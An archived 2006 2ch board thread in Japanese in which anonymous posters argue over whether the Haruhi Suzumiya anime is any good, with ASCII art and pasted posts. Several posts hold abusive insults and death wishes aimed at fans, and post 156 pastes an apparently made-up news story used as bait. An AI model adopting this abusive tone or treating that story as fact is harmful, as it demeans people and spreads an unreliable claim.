90 名前:メロン名無しさん :2006/08/17(木) 06:37:51 ID:???0
たしかに萌えアニメなら良し。しかし乱立させてもいいなんてどこにも書いてないぞww
一部のハルヒ厨には節度と常識が著しく欠けているようだな。


147 :CC名無したん:2006/08/17(木) 08:22:27 ID:M2npZ4/sO
>>1みたいなやつがいるから、まったく面白みのない作品になっちまった
とりあえず糞スレ立てないでね

148 :CC名無したん:2006/08/17(木) 08:27:49 ID:ZOzHY//7O
ハルヒ厨死ね

149 :CC名無したん:2006/08/17(木) 09:33:05 ID:nW/50RDOO
>>146
( ゚д゚)





( ゚д゚ )

150 :6代目さくら姉さん ◆nesan/DhDw :2006/08/17(木) 10:51:04 ID:kdYmKf5c0
そもそも「萌え作品」というか、「萌え」の定義があいまいなのよね。
さくら板のLRだけでなく、世間一般に言われている「萌え」そのものが。
私自身は、発生当初から「萌え」を意味不明なものとして捉えてる。
あえて説明をつけるとすれば、「自分に(特に性的な)興奮をもたらすもの」=「萌え」だと思う。
見るとちんこまんこが反応するもの、が、いわゆる「萌え」であると。

私はさくらたんは好きだけど、それだけでは性的に興奮しない。
もちろん「さくらたんのエロ画像」だったら反応するがな。

151 :CC名無したん:2006/08/17(木) 12:26:26 ID:h145tlW20
>>1
もっと色々読め。千冊とは言わんがせめて数百は読め。
人にハルヒ読めとか言う前に、お前自身の脳内の比較対象を増やせ。
ハルヒつまらんって言ってる人間をDQN少数扱いするのはそれからだ。
…読んでてそういう意見なら…まぁ人生頑張ってくれ。

152 :CC名無したん:2006/08/17(木) 12:56:05 ID:8GluEb+n0
落ち着いてください。もう>>1さんはVIPに帰っていないですよ^^

153 :CC名無したん:2006/08/17(木) 13:32:03 ID:4wZKuuwr0
ハルヒは好きだがハルヒ厨嫌いな奴挙手




154 :CC名無したん:2006/08/17(木) 13:44:44 ID:+KaiaRg/0
>>151
激しく同意。

ハルヒを狂信するやつに中高生が多い理由はこれだろうな。
普通にそこまで面白いものではないよ。京アニ動画はさすがではあったが、ほんとにそれだけ。
夏休みを利用して、いろいろ作品に触れてみたら?

155 :CC名無したん:2006/08/17(木) 13:57:17 ID:etQ43a7n0
1話の劇中劇は笑わせてもらったし、OP曲ED曲はイイと思うが、
本編の内容はイマイチだと思う。

156 :CC名無したん:2006/08/17(木) 14:34:08 ID:newgwrpu0
【コミケ】キャラのコスプレで女児補導【コスプレ】
 “オタクの祭典”と呼ばれる同人誌即売会「コミックマーケット」(コミケ)が
11日、東京・有明の東京ビッグサイトで始まった。お気に入りのアニメのキャラクターの
衣装を楽しむ若者のなかに、殆ど衣装をまとわない姿で歩く女児に警備員が注意をしたところ、
それを無視して逃走したので、コススペース(コスプレが集まる場所)を出たところで
警察に取り押さえられた。女児曰く、殆ど裸なのがそのアニメのキャラクターなのだそうだ。
http://live19.2ch.net/test/read.cgi/ogame/1155647692/


157 :CC名無したん:2006/08/17(木) 14:47:51 ID:YCjzKguA0
めがっさにょろにょろ

158 :CC名無したん:2006/08/17(木) 15:02:52 ID:xMD7c7Us0
>>156
おまえ頭いいな

159 :CC名無したん:2006/08/17(木) 17:48:06 ID:GOxGl5UIO
要するに>>1って、アニメを通じて現実社会との繋がりを得た「つもり」になってるだけのヒキコモリだろ?

160 :CC名無したん:2006/08/17(木) 17:54:36 ID:/ccFMqHl0
普通の人から見たらオタクのお前らが言えた事ではないがな
↓そしてこのスレの死亡にご協力しろカス↓

161 : ◆CDbhsnK77k :2006/08/17(木) 19:00:24 ID:8GluEb+n0
目くそ鼻くそって感じですね^^

162 :CC名無したん:2006/08/17(木) 22:56:59 ID:hOunIrraO
ハルヒは面白いから人気がある…ねぇ
ハルヒ好きってオレンジレンジが大好きですとか最近の趣味は日本代表の試合の観戦です、とかみたいな人間と同じ類の人間だろ

163 :CC名無したん:2006/08/18(金) 01:19:18 ID:nGRb+u020
http://jbbs.livedoor.jp/anime/4151/
ハルヒ板だお^^
マターリ楽しくやりませう

164 :CC名無したん:2006/08/18(金) 01:43:58 ID:69JVoZ0VO
ハルヒはゴミ
信者もヒッキーニート
ヲタアニメ


童顔のくせに生意気で首吹っ飛ばしたくなるw

光の巨人とか長門は丸きりエヴァのインスパイアw


165 :CC名無したん:2006/08/18(金) 01:44:53 ID:Wrv/k9PR0
でもCCさくらよりはマシ

166 :CC名無したん:2006/08/18(金) 01:49:45 ID:FsgHg4DL0
光の巨人てどっちかとゆうとパヤオの「シュナの旅」からじゃね? 名前もおもいきり「神人」だし

167 :CC名無したん:2006/08/18(金) 01:59:29 ID:ft+UvxUjO
この板じゃ釣りは通用せんよ。

168 :CC名無したん:2006/08/18(金) 02:16:17 ID:Wrv/k9PR0
>>167             ____
    (⌒     /⌒  ー、\   
   (  ≡   /( ●)  (●)\  
    (_,  /::::::⌒(__人__)⌒::::::\     
.    cー、  |     |r┬-/ '      |.  ,一っ
    ,へ λ \    `ー‐'      / 入  へ、
  <<</ヽ                    /\>>>


169 :CC名無したん:2006/08/18(金) 02:22:51 ID:UZRg4g7WO
『涼宮ハルヒの憂鬱』
アニメ見て原作も読んだが、全く面白くない。媚びすぎ
内容がナイヨー

170 :CC名無したん:2006/08/18(金) 02:25:46 ID:nd5KaiVA0
なにこのスレwwwロリペド犯罪者がハルヒ厨と馴れ合ってるのかwwwww
お前らキモ杉wwwww一生やってろwwwwwwwwwwwwwww

171 :CC名無したん:2006/08/18(金) 04:00:32 ID:qctSmwTQO
>170
お前も馴れ合ってるじゃないか

172 :CC名無したん:2006/08/18(金) 04:36:14 ID:THAZD7g60
>>165
同感
ロリペド犯罪者はしね

173 :CC名無したん:2006/08/18(金) 07:20:49 ID:JcG5GYIU0
0話? みたいなのを見たけどキモすぎてヤバかった
あのgdgd乗りをギャグとしてやってるところとかマジで酷い。ぶっちゃけ不快なだけだった。
一話もちょろっと見たけど特に面白くなかった

174 :CC名無したん:2006/08/18(金) 10:20:32 ID:Wrv/k9PR0
>>173
俺もさくらを見たとき同じ感情を抱きました。
なんでこんな頭の悪いアニメを見て熱狂する奴がいるんだろうと

175 :CC名無したん:2006/08/18(金) 10:42:44 ID:rcVdOzWv0
>>1
そもそも原作を読まないと面白さを感じない作品なんて糞以下なんだが
本当に面白いアニメだとそんな事しなくても面白いだろ

EDは確かに面白かったけど作画はそこまでよくない。

176 :CC名無したん:2006/08/18(金) 11:00:30 ID:rcVdOzWv0
65 名前:愛戦士[] 投稿日:2006/08/14(月) 10:07:39 ID:vHo6+QDD0
http://www.youtube.com/watch?v=wLpUEHVJ5wo&mode=related&search=

ライブシーンかっけーな。

83 名前:kwsk[] 投稿日:2006/08/14(月) 10:15:20 ID:MBuCZGwe0
>>65
わがらんなぁ

85 名前:独立記念日[] 投稿日:2006/08/14(月) 10:15:59 ID:QqbyJHR40
>>65
キモオタ専用の美少女アニメにしか見えん。

88 名前:マスター[] 投稿日:2006/08/14(月) 10:17:18 ID:45VZFXbX0
>65
寒い・・・

91 名前:座布団一枚[] 投稿日:2006/08/14(月) 10:18:15 ID:HfzExqe10
>>65
体はよく動いてるけど
頭の形が変だから頭が全然動かなくて笑った

92 名前:ガダルカナル[] 投稿日:2006/08/14(月) 10:19:27 ID:xMjLbWpT0
>>65
なんていうか、気持ち悪い

↑これが現実

177 :CC名無したん:2006/08/18(金) 12:14:31 ID:RU/dq6hG0
原作一巻の最初のハルヒがパソコン奪うシーンで糞だと思った。
こういう糞女郎を肯定するような物語を崇拝するヤツの気が知れねぇ

178 :CC名無したん:2006/08/18(金) 12:16:42 ID:Wrv/k9PR0
      .,lllllllll,,,,,,,,,,,,,,,,,,,,,,,                  ,iillllllllllii,,    ,,,iillllllllii,,,
  iiiiiiiillllllllllllllllllllllllllllllllllllllll|                ゙゙!lllllllllllllir .,,,iilllllllllllllll!゙゙′
  .llllllllllllllllllllllllll!!!!!!!!!!!!!!!!!″                ゙゙!!ll!゙",,,iilllllllllllll!!゙゙゜
  .゙゙゙゙゙゙”゛ llllllllllliiiiiiii,,,,,,,、                       ,,,iillllllllllll!!゙゙゜ ___,,,,,
    ,,,iiillllllllllllllllllllllllllllllliii,,                  ,,,,,,,,,iiiiiiilllllllllllllllllllllllllllllllllllllllll
  .,,illlllllllllllllllllll゙゙゙゙゙゙!!llllllllllllli,    .,,,,,iiiiiiiiiiiiiiiiiii,,,、  .llllllllllllllllllllllllllllllllllllllllllllllll!!!!!!l
  ,illllllllll!゙゙llllllllll|  ,illlllllllllllllll,  liilllllllllllllllllllllllllllllllli,,  lllllllllll!!lllllllllllllll!!゙゙゙”`
 ,llllllllll゙ .lllllllllll .,,illlllllllllllllllllll、 ゙llllll!!゙゙゙’   ゚゙llllllllll  ゙゙”`.,illllllllll!l゙’
: llllllllll° .llllllllllll,illllllllll!゙`lllllllllll  .゙゙゜      ,llllllllll!   ,llllllllllll°
: llllllllll,  lllllllllllllllllll!゙゜ ,lllllllllll          ,,,illllllllll!゜   .llllllllllllli,_    ,,,,,,,,iiiiiii、
: 'lllllllllllliiilllllllllllllll!!゙’  ,lllllllllll°    .,,,,iiillllllllllll!゙゜   ゙!llllllllllllllllliillllllllllllllllllllllll,、
 .゙!!lllllllllllllllll!!!゙゙`   .l!!llllllll°    .゙!lllllll!!!゙°     ゙゙!!llllllllllllllllllllllllllllll



179 :CC名無したん:2006/08/18(金) 12:29:49 ID:nd5KaiVA0
いつまでやるんすかwwwwwwwwwwww

180 :CC名無したん:2006/08/18(金) 12:57:39 ID:c5bfpMfh0
ハルヒはおもしろいけれど荒らしをするやつが大嫌い

181 :CC名無したん:2006/08/18(金) 13:14:39 ID:PHfATI9hO
>>1の策略的アンチ活動

>>7>>14>>19にてまともなハルヒ好きを演じる。
>>37の発言を最後にハルヒ「厨」へと変貌していく。
>>41、必死さを表現。徐々に厨としての本質を現してきた(実際はアンチ)。
なかなかの釣れ具合に満足したか、ついに>>58発動。
このあとの反響がまた凄まじい。一気にハルヒのイメージダウンに成功。ついでにハルヒ厨=VIPPERの印象を植え付けるべく>>66
そろそろ飽きて来たのでフィナーレといこうではないか。ついに>>81宣言。

 アンチがいるかぎりハルヒの悪評が独り歩きしてしまう、これはマズイ。
 今俺に出来るのはこのスレを終わらせることだけである。

  結論
  >>83

182 :CC名無したん:2006/08/18(金) 13:46:04 ID:nd5KaiVA0
アンタも必死っすねwwwwwwwwwwwwww

183 :CC名無したん:2006/08/18(金) 13:52:13 ID:XGiW2oNv0
ハルヒ厨はうざい

CCさくら板が必要かといわれたら

絶 対 必 要 な い で す

184 :CC名無したん:2006/08/18(金) 18:02:53 ID:A9efhyhn0
ハルヒの話はつまらないかもしれないけどのいぢの絵に萌えたからそれでいいとオモタ

185 :CC名無したん:2006/08/18(金) 18:23:48 ID:juCjJMCBO
糞アニメには糞信者か

186 :CC名無したん:2006/08/18(金) 19:52:45 ID:9W/sagNZO
所謂ご都合主義、ハルヒが"集めやすい"存在
だとしても、設定そのものの都合がよすぎる

面白いと微塵も感じなかった


187 :CC名無したん:2006/08/18(金) 21:16:44 ID:lEs36yXx0
さくらツマンネ

188 :サワ乃湯 ◆P2TlxkjE8. :2006/08/18(金) 23:42:48 ID:/5yD6+q7O
お前の存在なんなの?

189 :CC名無したん:2006/08/19(土) 00:30:38 ID:CHVmw4En0
http://jbbs.livedoor.jp/anime/4151/
ハルヒ板!みんな来てくれ

190 :CC名無したん:2006/08/19(土) 00:35:01 ID:oi0wavkE0
さくらもハルヒも一緒だろ。要は萌えるか萌えないかだけ。

191 :CC名無したん:2006/08/19(土) 01:45:52 ID:K/iFJpmw0
ハルヒ人気は京アニとのいぢ人気のおかげ。
でもこれがなかったらどうだろう?小難しいセリフまわしが多くてちょっと難解という印象もあるかもしれない。


ハルヒはアニメとしてはクオリティが高い。作画もシナリオもまあまあしっかりしてる。ちょっとおもしろくない部分も、作画やのいぢ絵で補ってる。


でも正直、厨のあまりにも酷い布教活動や、のっとりは印象が悪い。
ハルヒを良い作品だと言うのなら、少しでもハルヒのイメージを下げないようにしたらどうだろうか。

192 :CC名無したん:2006/08/19(土) 02:11:07 ID:KerRg9RH0
>>191そのとうり

193 :CC名無したん:2006/08/19(土) 02:11:11 ID:mE5/Xsu/0
物は試しで、第一話観てドン引きした


194 :CC名無したん:2006/08/19(土) 03:39:04 ID:r+VR/J2JO
>>193
クマー

195 :CC名無したん:2006/08/19(土) 05:02:27 ID:0Gv1mNex0
>>193
クマー



とsageろゴミ虫どもがぁああああああああああ

196 :CC名無したん:2006/08/19(土) 08:26:54 ID:CZwJH8iGO
YOUTUBEで第一話ちょっとみたけどあれほんとに第一話なのか?

197 :CC名無したん:2006/08/19(土) 10:00:42 ID:ooDltQ8u0
>>196
http://ja.wikipedia.org/wiki/%E6%B6%BC%E5%AE%AE%E3%83%8F%E3%83%AB%E3%83%92
TV放送は物語上の時系列と異なる順で行なわれたため、その際の次回予告ではハルヒの言う「構成話数」(時系列順)と
キョンの言う「放送話数」(テレビ放送順)の2種類の「話数」が登場している。
DVDの次回予告は時系列に沿ったものになっており、「TV版次回予告」は映像特典として収録される。

198 :CC名無したん:2006/08/19(土) 13:37:35 ID:CZwJH8iGO
なんかいきなりみくるの冒険とかいうのが始まってそれがかなり長く続いていたんだが…あれがそうなのか?

199 :ただの名無しには興味ありません:2006/08/19(土) 18:58:11 ID:WWY08/uD0
あれはお遊びというか、一話だけど一話じゃないw
第二話が第一話。

200 :CC名無したん:2006/08/19(土) 20:56:15 ID:/31JFH+f0
そういうのはDVDBOXとかでやればいいのに

201 :CC名無したん:2006/08/19(土) 21:04:45 ID:CZwJH8iGO
>>199
一話まるまるあれなのかよ
なんかある意味斬新?

202 :CC名無したん:2006/08/20(日) 01:54:43 ID:RxMs1nH60
キョンとか言う奴のしゃべりが寒いしキモイ

203 :CC名無したん:2006/08/20(日) 03:23:00 ID:HEOJoiTiO
まあそういうのは人それぞれ

204 :CC名無したん:2006/08/20(日) 15:19:55 ID:0JqGthG80
>>202
すんごいわかる。
そしてそれを真似してキョンっぽい喋り方してラジオやってるやつはもっとキモい。
ハルヒ見る前はそんな喋り方してなかっただろうにね。

205 :CC名無したん:2006/08/20(日) 21:55:12 ID:2clBNuwnO
はいはいのいじのいじ
ななついろ☆ドロップス

206 :CC名無したん:2006/08/20(日) 22:02:36 ID:4ZR3J8EGO
夏休みも、もう終わりだね。

207 :CC名無したん:2006/08/20(日) 22:42:50 ID:OL05e6iu0
ほんと信者の幸せ回路には頭が下がるよ

208 :CC名無したん:2006/08/21(月) 05:09:58 ID:8DYyz/FG0
アンチ必死だなwww

209 :CC名無したん:2006/08/21(月) 13:07:27 ID:8Mf+/FepO
のいぢがいなきゃ何もできなかったハルヒ

210 :CC名無したん:2006/08/21(月) 14:03:03 ID:UL6MizWDO
http://school5.2ch.net/test/read.cgi/student/1156106566/l50

963:学籍番号:774 氏名:_____sage2006/08/21(月) 01:53:09 ID:???
>>961
知らん。ハルヒって何?ググるって何?

211 :CC名無したん:2006/08/22(火) 07:39:34 ID:KmF9S+eQ0
ツンデレ厨のオレにはこの光景はたまりませんなぁ♪

212 :CC名無したん:2006/08/22(火) 08:31:16 ID:GcSP0GFfO
>>211
みんな男でもか?

213 :CC名無したん:2006/08/22(火) 14:19:49 ID:dK9NBxZaO
ハルヒが普通にヒドイ女である件について

214 :CC名無したん:2006/08/23(水) 06:04:44 ID:heXwPPNtO
ハルヒ普通にいい人なんですけど
俺必死だなw

215 :CC名無したん:2006/08/23(水) 06:22:48 ID:yKLAD1v40
このスレ見てると、放送初期の批判を思い出して興味深いね

216 :CC名無したん:2006/08/28(月) 18:52:22 ID:xai1xcZg0
削除人何やってんだ!!早く削除しろよ!!このカス!!

217 :CC名無したん:2006/08/28(月) 18:59:13 ID:tT0toO7NO
削除とかしなくていんじゃね
さくら板の良さはこの板全体に流れる寛大な雰囲気だと
ま、どーでもいーんですけど

218 :6代目さくら姉さん ◆nesan/DhDw :2006/08/28(月) 19:12:16 ID:3I4EIsx70
「ハルヒ」とスレタイに入ってて残ってるのが

ハルヒつまらんって言う奴は何なの?   (このスレ)
http://anime.2ch.net/test/read.cgi/sakura/1155713148/
さくら板を大いに盛り上げるための涼宮ハルヒのスレ
http://anime.2ch.net/test/read.cgi/sakura/1144157043/

の2つなので、これは今後も残るものと思われ。

219 :CC名無したん:2006/08/28(月) 19:26:43 ID:tT0toO7NO
むしろふたごスレの方が多い

220 :CC名無したん:2006/08/29(火) 20:15:27 ID:z7MhokVv0
中国アニヲタ集団によってハルヒ全話うpされています\(^o^)/
ttp://www.gamez.com.tw/archive/tid-339122.html


221 :CC名無したん:2006/08/29(火) 20:40:29 ID:aV30n4DLO
すべてのキャラが個性的なところが好きです。でもハルヒにはあまり萌えなかったっス…現実にあんな女いたら嫌ですよ…ワラ

222 :CC名無したん:2006/08/29(火) 21:53:12 ID:+f3t7uue0
>>218
>の2つなので、これは今後も残るものと思われ。

そ し て 伝 説 へ 

223 :CC名無したん:2006/08/30(水) 00:13:33 ID:CVsvkC7Y0
無残に敗北していった糞ハルヒの晒しスレってことでいいじゃん

224 :CC名無したん:2006/08/30(水) 00:20:35 ID:Z22QQgQl0
平野綾は地声の方がロリでえろい。

225 :CC名無したん:2006/08/30(水) 03:39:00 ID:QyXBesngO
俺はもう釣られん、と決めていたのに>>223クマー(ry

226 :CC名無したん:2006/08/30(水) 09:36:32 ID:pXmSdyIVO
ハルヒキャラでさくら板住人の属性的に一番近いのはキョンの妹
あとはおっぱいが大きすぎる
みくるたんのボイスは好きだが、デカすぎるおっぱいがかなりマイナス
ぺったんこがいいのに、わかってないよなぁ、のいじ

227 :CC名無したん:2006/08/30(水) 17:57:29 ID:nq4rwbO50
ストーリーがないキャラ萌え漫画

228 :CC名無したん:2006/08/31(木) 07:53:06 ID:e2qkcmdoO
漫画はハルヒではない、あんなもの。

229 :CC名無したん:2006/09/01(金) 00:18:50 ID:m7l01IVCO
(・∀・)ニヤニヤ


1:あやめφ ★ : 2006/08/31(木) 00:14:33 ID:???
角川エンタテインメント(角川E)が販売を手掛けるアニメーション「涼宮ハルヒの憂鬱」
(発売:角川書店)のDVDシリーズが驚異的な売上を見せている。

「涼宮ハルヒの憂鬱」は、シリーズ総発行部数130万部を誇る人気1ライトノベル
(角川書店)をTVアニメ化したもの。団長・涼宮ハルヒに引っ張りまわされる仲間たちの
ドタバタを描いた“非日常系学園ストーリー”だ。今年4月から7月まで東京MXテレビなど
ローカルTVで放送され、6月23 日に発売されたセルDVD第一弾「〜朝比奈ミクルの冒険
Episode00」は7万枚、続く7月 28日発売「〜1」は8万枚を記録、明日8月25日(金)発売の
「〜2」も9万枚出荷と、発売ごとに販売枚数を増やしている。
1万枚を超えれば大ヒットと言われている中でこれは突出した数字。

この現象について角川EのアニメーションSPグループ部長兼ドリームワークスマーケティング
グループマネージャーの八十河恒治氏は、「普通ではないのが『ハルヒ』。応援団の力が凄くて、
一時はDVDランキング(アニメ)で上位を独占しました。ユーザーは、現実でも次に何が
起こるかわからない“非日常”を求めているのではないでしょうか。現在ラジオ番組
『涼宮ハルヒの憂鬱 SOS団ラジオ支部』を毎週金曜日深夜24時30分からCRKラジオ関西 558で
絶賛放送中ですが、声優さんたちもなりきっているので、まるで実在するかのように
捉えられているようです」と分析する。

同社常務取締役/営業・マーケティング担当の石橋隆文氏は、「このままの勢いでいけ
ば全8巻で合計50万枚は超えそうです。何らかの形で、感謝の気持ちをユーザーに少しでも
返していきたい。バンダイさんの『ガンダム』シリーズのように当社の大きな柱になれば」
と意欲を見せる。ソフト販売の重要拠点に急成長しつつある。


http://news19.2ch.net/test/read.cgi/moeplus/1156950873/

230 :CC名無したん:2006/09/03(日) 12:08:39 ID:nIXTzA170
               /  / ,         ヽ ヽ
              /イ l l ,i| .ト、  ト、  .i l丶
              l イ.l !`iーl-{_ \.{_,-‐ナ |: \
       ,-'"ヽ    l/| i i ヘ|rf‐i、   .,ィ‐Tァi |. i`
      /   i、    ヘハ ト、 ゚ー.リ⌒、゚ー゙,,イ .ル'   _/\/\/\/|_  
      { ノ   "' ゝ    !.∧ ̄  __  ̄.ルレ'  \          /
      /       "' ゝ   `,.=r  t=、´      <  バーカ!! >
      /          .ヽ /f'"   ゙Y \    /          \       
     i              ヽ       ノ    ̄|/\/\/\/ ̄       
    /                       }.          
    i'    /、                 ,i..          
    い _/  `-、.,,     、_       i          
   /' /     _/  \`i   "   /゙   ./          
  (,,/     , '  _,,-'" i  ヾi__,,,...--t'"  ,|           
       ,/ /     \  ヽ、   i  |           
       (、,,/       〉、 、,}    |  .i          
                `` `     ! 、、\          
                       !、_n_,〉>

231 :CC名無したん:2006/09/04(月) 02:15:47 ID:Upj7f5IiO
ねえ、今どんな気持ち?
アンチのみなさ〜ん?

232 :CC名無したん:2006/09/04(月) 05:41:44 ID:o52gBmMu0
ふつ〜

233 :CC名無したん:2006/09/04(月) 11:27:05 ID:iMPtvJ6oO
>>1
その言葉、逆に差し替えてオマエに返すよww

234 :CC名無したん:2006/09/04(月) 16:30:01 ID:SoYhLEH3O
ハルヒ面白いか?
一応TSUTAYAで借りて見たけど、そんな極端に面白いとはおもわなかった
人気の本当の理由は何なんだろ?

235 :CC名無したん:2006/09/04(月) 16:37:50 ID:Vpydkc700
>>234
ハルヒっていうキャラを好きになれるかなれないか
じゃない?
アンチは大抵基地外女がうぜぇとか言ってるし

236 :CC名無したん:2006/09/04(月) 19:00:11 ID:SoYhLEH3O
信者はハルヒの何が好きなんだ?
どっちかっていったらミクルの方が好きだ
女の子に振り回されるのは悪くないけど、確信犯に振り回されるのは、たとえ女の子でも納得いかない
ツンデレなのかもしれないが、ハルヒのやり方には好感もてない
さくら板にハルヒは場違いだよ
幼女じゃないし

237 :CC名無したん:2006/09/05(火) 04:13:55 ID:W/UmEs/uO
普通に萌えとか無しにして面白かったんだけど…おかしいのかな私
宇宙人とか未来人とか超能力者とかエッ(゚Д゚)!!となってしまた

238 :CC名無したん:2006/09/05(火) 04:34:35 ID:F1I/pWMC0
ハルヒの脚本の糞さはMUSASHI並

239 :CC名無したん:2006/09/05(火) 05:17:14 ID:l89aoDq/0
見た目だけならわからんでもないが、話はどう考えてもつまんね。
キャラがかわいいだけの作品はいくらでもあるからな。

240 :CC名無したん:2006/09/05(火) 09:48:54 ID:lhlpT5FHO
見た目はかわいいねハルヒは
キャラとしてはイマイチ
確信犯で悪意のあるキャラだから主人公としては最悪だと思う

241 :CC名無したん:2006/09/05(火) 21:41:16 ID:nnR7XlrdO
本編中に、ハルヒの本当の性格・人柄が読み取れるシーンが何度も出ているのに
ハルヒを悪者みたいに言う人は本気で言ってるのだろうか。

242 :CC名無したん:2006/09/06(水) 02:52:24 ID:1KElqUvQO

何度でもゆう
ツンデレだろうとなんだろうと
ハルヒは確信犯だ
面白いかどうかは内容全部見た訳じゃないから知らないが
表面的なキャラクターは好みではない

243 :CC名無したん:2006/09/06(水) 03:37:56 ID:jQnUncLYO
>>1
>見たけどつまらんとか言う奴は原作嫁。
それは違うだろw
アニメで初めて観て、おもしろくなかったんならそれ以上言うことはあるまい
アニメから入った人でも、原作に興味が出たなら読めばいいってだけだ

たしかに観てもいないのに批評するアンチはカスだが、
お前みたいな信者も割とウザイよ

244 :CC名無したん:2006/09/06(水) 03:39:06 ID:jQnUncLYO
>>240
主人公は一応キョンだな

245 :CC名無したん:2006/09/06(水) 11:26:44 ID:q/q0wqR6O
>>243

>>81
>>181

246 :CC名無したん:2006/09/06(水) 14:40:42 ID:AZb6ld8a0 ?2BP(774)
アンチの仕業かアンチを装って興味を出せさせるピットクルーの仕業か
あやふやになってしまいましたなぁ・・・

247 :CC名無したん:2006/09/06(水) 22:59:11 ID:jQnUncLYO
>>245
読むのメンドクセ

248 :CC名無したん:2006/09/07(木) 11:34:50 ID:VzQ4hPBUO
寺田はるひは確かに面白いな

249 :CC名無したん:2006/09/07(木) 15:01:10 ID:SHwEt6n00
918 名無しが氏んでも代わりはいるもの sage 2006/09/07(木) 00:06:05 ID:???
ハルヒってほんっっっっとうのキモヲタをターゲットにしてるアニメじゃん。
絵を見た時点で普通の人は拒否反応起こす。なんだあの絵?

それをカモフラージュして萌アニメを見ているという感覚を薄れさせる為、また、
それを見ている視聴者が「萌アニメを見てるキモイ自分」を肯定しやすくために
SFちっくな設定その他あらゆる設定をグチャグチャに付加させただけの二番煎じのゴミアニメ、それがハルヒ。
興業成績、社会への影響、その他もろもろ全てにおいてエヴァ>>>>>>>>>>>ハルヒ(失笑)

ハルヒ=ハンパ無い超キモヲタ御用達のクソアニメ

こう言われるともはやハルヒ厨は反論できず
「お前も鏡見ろよw」「必死だなw」「アニメ見てる時点で(ry」等の
相手を罵倒するレス、「お前がなんと言おうが面白い」等の
ただの個人的な主観によるレスしか出来なくなる。
結論、ハルヒはゴミ。

924 名無しが氏んでも代わりはいるもの sage 2006/09/07(木) 00:57:26 ID:???
要素の付加云々もまあ、たしかにそうだと思うが

それぞれのアニメの「伝えたいこと」という点に考えを絞ったときに、
ハルヒが何を目的にしてるかに気づくんじゃね?要は「萌え」だろ。確実に。
そこに壮大なテーマは無い。ここがエヴァとは決定的に違う。

250 :CC名無したん:2006/09/07(木) 15:23:43 ID:r8kD9fbaO
まあキモイエヴァ信者の、異常なまでのエヴァ崇拝っぷりは知ってるから
どうでもいいよね

251 :CC名無したん:2006/09/07(木) 15:28:01 ID:E7np2LatO
と、言う風に反論出来なくなると議論では無く
ただ相手を誹謗中傷するだけになるのがハルヒ厨www

252 :CC名無したん:2006/09/07(木) 15:33:47 ID:r8kD9fbaO
まあその通りだし
あ、ちなみに俺はハルヒ厨じゃないよ
アニメは蓄め録りしてあって一切触れてない状態で、原作は読んでない
だからそんなに必死にならなくていいよエヴァ信者たん

253 :CC名無したん:2006/09/07(木) 15:42:28 ID:E7np2LatO
そうか…失礼。

254 :CC名無したん:2006/09/07(木) 15:52:19 ID:r8kD9fbaO
どうでもいいけど、「その通り」ってのは>>250のことだから

255 :CC名無したん:2006/09/08(金) 17:03:05 ID:FPAbnzYaO
キモいエヴァ信者とゆうが
さくら板住人の方がはるかにキモい

256 :CC名無したん:2006/09/09(土) 09:27:59 ID:UVZOfEiGO
ジャンルの異なる2つの作品をそのまま比べようなんて……

257 :CC名無したん:2006/09/24(日) 19:03:48 ID:r8Vz/h4eO


258 :CC名無したん:2006/10/02(月) 16:32:10 ID:OVibCw8oO


259 :CC名無したん:2006/10/17(火) 14:54:09 ID:r99bG3kV0
   ┏━━━━━━━━━━━━━━┓
   ┃        ,  ― ノ)          ┃
   ┃     γ∞γ~  \        ┃
   ┃     人w/ 从从) )         .┃
   ┃ 保 全  ヽ | |┬ イ |〃 活 動   ┃
   ┃      `wハ~ . ノ) .         ┃
   ┃                      ┃
   ┃       CCさくら板         ┃
   ┃ http://anime.2ch.net/sakura/   ┃
   ┣━━━━━━━━━━━━━━┛
   ┃  ,   ― '
   ┃r∞r~   \
   ┃ |  / 从从) )
   ┃ヽ | | l  l |〃
   ┃ `wハ~ ーノ)
  (ア) ) ̄.ゞA.ノ"\
   ┃ ̄ ̄L|:|__〈ヽ \ __  CCさくら板保守保全パトロール
   ┃   ノァ‐r‐‐ゝ` 、(と"  荒氏は、報告する
   ┃ r'( /  !   `ァァ       シカト(煽らない)
   ┃ ^i `ァ〜r-〜'" ,r'        いつもの平常レスで対処
   ┃.  `^〜n〜r'^'      ★ご協力お願いします★
   ┃    (^i(^i!ーi

要保全 重要歴史スレ
朝倉涼子萌えスレ
http://anime.2ch.net/test/read.cgi/sakura/1155696998/
ハルヒつまらんって言う奴は何なの?
http://anime.2ch.net/test/read.cgi/sakura/1155713148/
キーボードを見ないで朝比奈みくるとタイプするスレ
http://anime.2ch.net/test/read.cgi/sakura/1155834481/
長門有希萌えスレ
http://anime.2ch.net/test/read.cgi/sakura/1155981785/

260 :CC名無したん:2006/10/19(木) 22:30:41 ID:drDuAOJeO
奴つまらんって言うハルヒは何なの?

261 :CC名無したん:2006/10/20(金) 11:26:40 ID:DGaQLcVLO
日本語でおk

262 :CC名無したん:2006/10/20(金) 13:31:15 ID:WZ8s6xaI0
死に生くをいわず 拳力を尽くさん

263 :( ´∀)・∀),,゚Д)さん:2006/11/01(水) 08:22:22 ID:x++xUd3j0
                      ◎___
                      //     /
                    // 居   /
                    // 場   /
                    // 所  ./
                   // ネ  /
                   // /  ./
                  // ヨ  /
             ∧空∧/___/
            {´ ◎ `}<  みんなのCCさくら板を守るために、漏れは戦う!!
             ):::::::::(/ゝゝ,ゝゝ,
            /::::⊂二_) JJJJ
         手二|::::::::::::::\__/
   ∧_∧    (;;;;;;;;;;;;;;;;;;;)
  (3 ω 3)  __<< \\      __  //    ─────
   \  <_丶::::◎>__<:::◎>( ̄ ̄ )二//     ─────
  ┌(__)┐__)┐_(_/⌒ヽ二二_//    ─────
     (ニニニ)_○//(ニニニ)__)二二/      ─────


264 :CC名無したん:2006/12/02(土) 04:22:50 ID:vhkpK6z4O
まだあったのか

62 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)